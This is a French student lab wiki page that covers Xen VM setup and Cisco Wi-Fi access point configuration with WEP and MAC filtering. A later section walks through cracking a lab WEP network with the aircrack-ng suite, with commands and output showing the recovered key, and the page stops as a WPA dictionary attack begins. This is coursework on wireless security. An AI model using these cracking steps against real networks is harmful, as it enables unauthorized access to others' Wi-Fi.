TP sysres IMA2a5 2016/2017 G3

De Wiki de Projets IMA
Révision datée du 16 janvier 2017 à 10:08 par Cvillain (discussion | contributions) (Page créée avec « == Machine virtuelle == Le but est de créer une machine virtuelle Xen Linux sur le dom0 cordouan.insecserv.deule.net Création de la machine <pre>xen-create-image --hostna... »)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)

Machine virtuelle

Le but est de créer une machine virtuelle Xen Linux sur le dom0 cordouan.insecserv.deule.net

Création de la machine

xen-create-image --hostname Gringe --ip 193.48.57.180 --netmask 255.255.255.240 --dir /usr/local/xen

Lancement de la machine

xl create Gringe.cvg

Connexion à la machine

xl console Gringe 

Configuration des paramètres de la carte réseau. On modifie le fichier /etc/network/interfaces

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 193.48.57.180
        netmask 255.255.255.240
        gateway 193.48.57.190


Point d'accès Cisco

Pour configurer la borne d'accès Wi-Fi Cisco, on commence par la connecter à un port USB du pc via un adaptateur. On repère ensuite sur quel port on s'est connecté

dmesg | grep tty

On se connecte sur la borne à l'aide de minicom. Il ne faut pas oublier de passer en root d'abord.

su
minicom -os

Une fois minicom démarré, il faut modifier certains paramètres pour pouvoir communiquer

A - Serial Device           : /dev/ttyUSB0
B - Lockfile Location       : /var/lock 
C - Callin Program          :
D - Callout Program         :
E - Bps/Par/Bits            : 9600 8N1
F - Hardware Flow Control   : No
G - Software Flow Control   : No

Maintenant on se connecte en root sur le Cisco

enable
config terminal

Puis on configure de SSID et le mot de passe

ap(config)#dot11 ssid Pocahontas
ap(config-ssid)#dot11 ssid Pocahontas 
ap(config-ssid)#authentication open
ap(config-ssid)#guest-mode 
ap(config)#interface dot11Radio0 
ap(config-if)#ssid Pocahontas
ap(config-if)#encryption key 1
ap(config-if)#encryption key 1 size 40bit 0 0123456789 transmit-key
ap(config-if)#encryption mode Wep mandatory 

On souhaite sécuriser la connexion en n'autorisant que certaines adresses MAC à se connecter. Pour cela on repère d'abord notre adresse MAC

su
ifconfig

Sur les eeePC on regarde HWaddr de l'interface wlan0. Par exemple sur ce PC pour l'interface eth0 cela ressemble à ça

eth0      Link encap:Ethernet  HWaddr 00:22:4d:7a:ea:a1  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:19569 errors:0 dropped:166 overruns:0 frame:0
          TX packets:4408 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:10043846 (9.5 MiB)  TX bytes:543435 (530.6 KiB)
          Interrupt:20 Memory:f6500000-f6520000

Enfin on refuse toutes les connexions sauf celles qui on la bonne adresse

ap(config)#access-list 701 permit  0022.4d7a.eaa1  0000.0000.0000 
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff 

Une fois la point d'accès configuré, on peut connecter l'eeePC à la borne. Pour cela on commence par modifier le fichier /etc/network/interfaces

# The loopback network interface
auto lo
iface lo inet loopback

auto wlan0
iface wlan0 inet dhcp
	wireless-mode managed
	wireless-essid Pochontas
	wireless-key 0123456789


Attaque d'un point d'accès WEP

Pour cette attaque on utilise aircrack-ng. On démarre sur notre interface Wi-Fi.

airmon-ng start wlan2 

On scan le réseau

airodump-ng wlan2

On souhaite attaquer la cracotte03, on se focalise donc dessus.

airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack

On observe CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                    
04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             
                                                                                                                                    
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           
                                                                                                                                    
04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221</pre>

Pour augmenter le nombre de paquet qui transitent, on va stimuler la borne. Pour cela on ouvre un autre terminal et on utilise airplay.

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2

Pour trouver la clé, on ouvre un autre terminal et on utilise aircrack-ng

aircrack-ng crack.cap 
                                                            Aircrack-ng 1.2 beta3


                                            [00:00:39] Tested 257766 keys (got 32866 IVs)

   KB    depth   byte(vote)
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) 
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) 
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) 
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) 
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) 
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) 
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) 
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) 
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) 
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) 
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) 
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) 
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) 

             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] 
	Decrypted correctly: 100%


Attaque d'un point d'accès WPA/PSK

Cette fois-ci il va falloir fournir un dictionnaire à aircrack-ng pour qu'il "brut force" le point d'accès. Pour simplifier, on a décider que le mot de passe du point d'accès sera uniquement composé de chiffres.